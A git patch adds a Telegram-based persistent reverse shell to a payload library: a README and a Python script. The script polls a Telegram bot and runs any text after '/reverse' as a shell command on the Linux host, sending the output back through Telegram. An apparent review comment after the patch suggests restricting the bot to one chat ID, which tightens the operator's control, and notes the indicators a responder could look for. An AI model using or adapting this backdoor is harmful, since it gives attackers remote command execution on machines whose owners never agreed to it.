From 5632b8fdc5d45efb39bff04742dc909bef759b22 Mon Sep 17 00:00:00 2001
From: aleff-github
Date: Thu, 3 Aug 2023 10:22:32 +0200
Subject: [PATCH] payload
---
 .../README.md | 41 ++++++++++++++++++
 .../connection.py | 43 +++++++++++++++++++
 2 files changed, 84 insertions(+)
 create mode 100644 payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md
 create mode 100644 payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/connection.py
diff --git a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md
new file mode 100644
index 0000000..ff357e6
--- /dev/null
+++ b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md
@@ -0,0 +1,41 @@
+# Persistent Reverse Shell - Telegram Based
+
+A script used to configure a persistent reverse shell on a Linux computer trough a pre-configured Telegram Bot.
+
+**Category**: Execution
+
+## Dependencies
+
+* Internet Connection
+
+## Description
+
+A script used to configure a persistent reverse shell on a Linux computer trough a pre-configured Telegram Bot.
+
+This payload is based on [Telegram Persistent Connection](Telegram_Persistent_Connection) payload for create the Telegram connection.
+
+The script accept the `/reverse` command using the format `/reverse ` and split `/reverse` from `` trough the `extract_command()` function, then execute the command acquired acquiring the output trough the function `run_command()`.
+
+Because Telegram uses a limited size per message, the script divides the output of the command into a theoretically infinite chunk of 1000 characters in length that will be sent one by one through the Telegram Bot.
+
+## Credits
+
+

Aleff :octocat:

+
+ + + + + +
+ + + +
Github +
+ + + +
Linkedin +
+
\ No newline at end of file
diff --git a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/connection.py b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/connection.py
new file mode 100644
index 0000000..bcb3677
--- /dev/null
+++ b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/connection.py
@@ -0,0 +1,43 @@
+from telebot import TeleBot, types
+import subprocess
+
+# Set here the Telegram bot token
+BOT_TOKEN = ""
+bot = TeleBot(BOT_TOKEN)
+
+commands = [
+ types.BotCommand("/reverse", "/reverse ")
+]
+
+bot.set_my_commands(commands=commands)
+
+@bot.message_handler(commands=['reverse'])
+def reverse_shell(message):
+ command = extract_command(message.text)
+ if command != "":
+ print(f"Command received: {command}")
+ out = run_command(command)
+ if len(out) > 1000:
+ bot.reply_to(message, "Message too long...")
+ chunk_size = 1000
+ for i in range(0, len(out), chunk_size):
+ bot.send_message(message.chat.id, out[i:i+chunk_size])
+ else:
+ bot.reply_to(message, out)
+
+def extract_command(message):
+ command_prefix = "/reverse"
+ if message.startswith(command_prefix):
+ return message[len(command_prefix):].strip()
+ else:
+ return None
+
+def run_command(command):
+ try:
+ result = subprocess.check_output(command, shell=True, text=True)
+ return result.strip()
+ except subprocess.CalledProcessError as e:
+ return f"Some error: {e}"
+
+
+bot.infinity_polling()
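Review bot: `reverse_shell` hands whatever follows `/reverse` to `subprocess.check_output(command, shell=True)` without checking who sent the message, so every Telegram account that can message the bot gets shell access to the host running this script, not only the person who deployed it. The handler should return before calling `extract_command` unless the sender matches a configured value, for example `if message.chat.id != ALLOWED_CHAT_ID: return`, with `ALLOWED_CHAT_ID` as a new constant next to `BOT_TOKEN`. The file also has no comment describing what it does on the machine; a module docstring stating that it long-polls the Telegram Bot API, runs received text through the shell and prints each command to stdout would tell a responder what to look for (a Python process holding a connection to Telegram and spawning shell children).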